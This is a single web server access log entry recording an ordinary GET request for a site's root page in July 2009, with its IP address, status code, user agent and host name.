65.17.253.220 - - [04/Jul/2009:18:38:51 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
